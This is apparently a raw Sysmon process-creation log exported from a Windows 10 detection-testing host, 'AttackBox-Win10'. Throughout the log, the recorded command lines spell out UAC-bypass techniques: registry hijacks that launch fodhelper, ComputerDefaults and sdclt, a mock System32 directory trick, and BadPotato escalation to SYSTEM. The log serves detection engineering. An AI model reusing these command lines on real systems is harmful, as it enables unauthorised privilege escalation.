AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000666722Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:09.214{51A89197-C789-6552-E002-000000001E00}6960C:\Windows\System32\sdclt.exe10.0.17134.1 (WinBuild.160101.0800)Microsoft® Windows BackupMicrosoft® Windows® Operating SystemMicrosoft Corporationsdclt.exe"C:\Windows\system32\sdclt.exe" C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=81075ADC86FCD253E84E5E9745881DA503512F0E,MD5=0632A8402C6504CD541AC93676AAD0F5,SHA256=5C5F48B079FBCAA5DFB3ED0CD3352154AC4869DA98FDCC44601C076F47503A84,IMPHASH=651E4CF2B45257EE0CBBFBAFB8BF4454{51A89197-C788-6552-DE02-000000001E00}7180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item -Force -Path \""HKCU:\Software\Classes\Folder\shell\open\command\"" -Value 'cmd.exe /c notepad.exe' New-ItemProperty -Force -Path \""HKCU:\Software\Classes\Folder\shell\open\command\"" -Name \""DelegateExecute\"" Start-Process -FilePath $env:windir\system32\sdclt.exe Start-Sleep -s 3}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666577Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:08.105{51A89197-C788-6552-DF02-000000001E00}4972C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C788-6552-DE02-000000001E00}7180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item -Force -Path \""HKCU:\Software\Classes\Folder\shell\open\command\"" -Value 'cmd.exe /c notepad.exe' New-ItemProperty -Force -Path \""HKCU:\Software\Classes\Folder\shell\open\command\"" -Name \""DelegateExecute\"" Start-Process -FilePath $env:windir\system32\sdclt.exe Start-Sleep -s 3}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666571Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:08.095{51A89197-C788-6552-DE02-000000001E00}7180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {New-Item -Force -Path \""HKCU:\Software\Classes\Folder\shell\open\command\"" -Value 'cmd.exe /c notepad.exe' New-ItemProperty -Force -Path \""HKCU:\Software\Classes\Folder\shell\open\command\"" -Name \""DelegateExecute\"" Start-Process -FilePath $env:windir\system32\sdclt.exe Start-Sleep -s 3}C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666522Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:07.841{51A89197-C787-6552-DD02-000000001E00}5648C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C787-6552-DC02-000000001E00}7568C:\Windows\System32\cmd.exe"cmd.exe" /c mkdir "\\?\C:\Windows \System32\" & copy "C:\Windows\System32\cmd.exe" "\\?\C:\Windows \System32\mmc.exe" & mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666515Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:07.831{51A89197-C787-6552-DC02-000000001E00}7568C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c mkdir "\\?\C:\Windows \System32\" & copy "C:\Windows\System32\cmd.exe" "\\?\C:\Windows \System32\mmc.exe" & mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666408Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:07.291{51A89197-C787-6552-DB02-000000001E00}6412C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C787-6552-DA02-000000001E00}7980C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666389Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:07.271{51A89197-C787-6552-DA02-000000001E00}7980C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C787-6552-D902-000000001E00}5824C:\Windows\System32\ComputerDefaults.exe"C:\Windows\System32\ComputerDefaults.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666320Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:07.152{51A89197-C787-6552-D902-000000001E00}5824C:\Windows\System32\ComputerDefaults.exe10.0.17134.1 (WinBuild.160101.0800)Set Program Access and Computer Defaults Control PanelMicrosoft® Windows® Operating SystemMicrosoft CorporationComputerDefaults.EXE"C:\Windows\System32\ComputerDefaults.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=6ACA6C418777015ECD87287C1228084720B26AA4,MD5=1D494543B5C91E0EDD4C7C6C63EE25F0,SHA256=F2B961FC015180D8B4602EB4F4D22A6673AB6C3ED654C59E03F0AFBA1B68A2F5,IMPHASH=E4233225763223D3EDD7DFC3552572B3{51A89197-C785-6552-D402-000000001E00}3992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Force New-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""DelegateExecute\"" -Value \""\"" -Force Set-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe\"" -Force Start-Process \""C:\Windows\System32\ComputerDefaults.exe\""}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666057Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:06.991{51A89197-C786-6552-D802-000000001E00}4820C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 366 0000025DF26E2400C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000666024Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:06.950{51A89197-C786-6552-D702-000000001E00}5368C:\Windows\System32\ComputerDefaults.exe10.0.17134.1 (WinBuild.160101.0800)Set Program Access and Computer Defaults Control PanelMicrosoft® Windows® Operating SystemMicrosoft CorporationComputerDefaults.EXE"C:\Windows\System32\ComputerDefaults.exe" C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=6ACA6C418777015ECD87287C1228084720B26AA4,MD5=1D494543B5C91E0EDD4C7C6C63EE25F0,SHA256=F2B961FC015180D8B4602EB4F4D22A6673AB6C3ED654C59E03F0AFBA1B68A2F5,IMPHASH=E4233225763223D3EDD7DFC3552572B3{51A89197-C785-6552-D402-000000001E00}3992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Force New-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""DelegateExecute\"" -Value \""\"" -Force Set-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe\"" -Force Start-Process \""C:\Windows\System32\ComputerDefaults.exe\""}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000665655Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:05.580{51A89197-C785-6552-D502-000000001E00}7844C:\Windows\System32\notepad.exe10.0.17134.1 (WinBuild.160101.0800)NotepadMicrosoft® Windows® Operating SystemMicrosoft CorporationNOTEPAD.EXEnotepad.exeC:\DetectionTesting\Temp\ExternalPayloads\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=867B54F1BC5B71045A9A00BACA485A24176B202C,MD5=BB9A06B8F2DD9D24C77F389D7B2B58D2,SHA256=899346F9F283A4FD5AA03015A3F58CDE5B9C0B6A5C4D64C2CC74E9B22C1348D7,IMPHASH=A8F8224EB74E94301B59B88492740A75{51A89197-C785-6552-D202-000000001E00}620C:\Windows\System32\cmd.execmd /c notepad.exeNT AUTHORITY\SYSTEM 154100x8000000000000000665654Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:05.581{51A89197-C785-6552-D602-000000001E00}7220C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C785-6552-D402-000000001E00}3992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Force New-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""DelegateExecute\"" -Value \""\"" -Force Set-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe\"" -Force Start-Process \""C:\Windows\System32\ComputerDefaults.exe\""}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000665647Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:05.568{51A89197-C785-6552-D402-000000001E00}3992C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {New-Item \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Force New-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""DelegateExecute\"" -Value \""\"" -Force Set-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe\"" -Force Start-Process \""C:\Windows\System32\ComputerDefaults.exe\""}C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000665608Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:05.459{51A89197-C785-6552-D302-000000001E00}1708C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsNT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C785-6552-D202-000000001E00}620C:\Windows\System32\cmd.execmd /c notepad.exeNT AUTHORITY\SYSTEM 154100x8000000000000000665602Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:05.447{51A89197-C785-6552-D202-000000001E00}620C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Execmd /c notepad.exeC:\DetectionTesting\Temp\ExternalPayloads\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C77F-6552-B902-000000001E00}7740C:\DetectionTesting\Temp\ExternalPayloads\BadPotato.exe"C:\DetectionTesting\Temp\ExternalPayloads\BadPotato.exe" notepad.exe ATTACKBOX-WIN10\VICTIM 154100x8000000000000000665480Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:05.062{51A89197-C785-6552-D102-000000001E00}7172C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C785-6552-D002-000000001E00}1728C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000665436Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:05.035{51A89197-C785-6552-D002-000000001E00}1728C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C784-6552-CF02-000000001E00}1612C:\Windows\System32\fodhelper.exe"C:\Windows\System32\fodhelper.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000665365Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:04.893{51A89197-C784-6552-CF02-000000001E00}1612C:\Windows\System32\fodhelper.exe10.0.17134.1 (WinBuild.160101.0800)Features On Demand HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationFodHelper.EXE"C:\Windows\System32\fodhelper.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=84C1DE94E002DE58009973F5DD16241D286201A5,MD5=1D1F9E564472A9698F1BE3F9FEB9864B,SHA256=B52FBB99308493A27AAC725CF70721041CDEE61CACA19792B949CC0867A27964,IMPHASH=9B87653B0F199E556A5CCF9C623D328F{51A89197-C783-6552-CB02-000000001E00}1940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Force New-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""DelegateExecute\"" -Value \""\"" -Force Set-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe\"" -Force Start-Process \""C:\Windows\System32\fodhelper.exe\""}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000665056Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:04.641{51A89197-C784-6552-CE02-000000001E00}6400C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 324 0000025DF37D82F0C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000665046Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:04.610{51A89197-C784-6552-CD02-000000001E00}7828C:\Windows\System32\fodhelper.exe10.0.17134.1 (WinBuild.160101.0800)Features On Demand HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationFodHelper.EXE"C:\Windows\System32\fodhelper.exe" C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=84C1DE94E002DE58009973F5DD16241D286201A5,MD5=1D1F9E564472A9698F1BE3F9FEB9864B,SHA256=B52FBB99308493A27AAC725CF70721041CDEE61CACA19792B949CC0867A27964,IMPHASH=9B87653B0F199E556A5CCF9C623D328F{51A89197-C783-6552-CB02-000000001E00}1940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Force New-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""DelegateExecute\"" -Value \""\"" -Force Set-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe\"" -Force Start-Process \""C:\Windows\System32\fodhelper.exe\""}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000664856Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:03.625{51A89197-C783-6552-CC02-000000001E00}5304C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C783-6552-CB02-000000001E00}1940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Force New-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""DelegateExecute\"" -Value \""\"" -Force Set-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe\"" -Force Start-Process \""C:\Windows\System32\fodhelper.exe\""}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000664850Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:03.613{51A89197-C783-6552-CB02-000000001E00}1940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {New-Item \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Force New-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""DelegateExecute\"" -Value \""\"" -Force Set-ItemProperty \""HKCU:\software\classes\ms-settings\shell\open\command\"" -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe\"" -Force Start-Process \""C:\Windows\System32\fodhelper.exe\""}C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000664554Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:03.022{51A89197-C783-6552-CA02-000000001E00}2284C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C782-6552-C902-000000001E00}2972C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000664539Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:02.995{51A89197-C782-6552-C902-000000001E00}2972C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C782-6552-C802-000000001E00}4400C:\Windows\System32\fodhelper.exe"C:\Windows\system32\fodhelper.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000664471Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:02.559{51A89197-C782-6552-C802-000000001E00}4400C:\Windows\System32\fodhelper.exe10.0.17134.1 (WinBuild.160101.0800)Features On Demand HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationFodHelper.EXE"C:\Windows\system32\fodhelper.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=84C1DE94E002DE58009973F5DD16241D286201A5,MD5=1D1F9E564472A9698F1BE3F9FEB9864B,SHA256=B52FBB99308493A27AAC725CF70721041CDEE61CACA19792B949CC0867A27964,IMPHASH=9B87653B0F199E556A5CCF9C623D328F{51A89197-C781-6552-BF02-000000001E00}8064C:\Windows\System32\cmd.exe"cmd.exe" /c reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f & reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f & fodhelper.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000664442Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:02.523{51A89197-C782-6552-C702-000000001E00}2184C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000664370Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 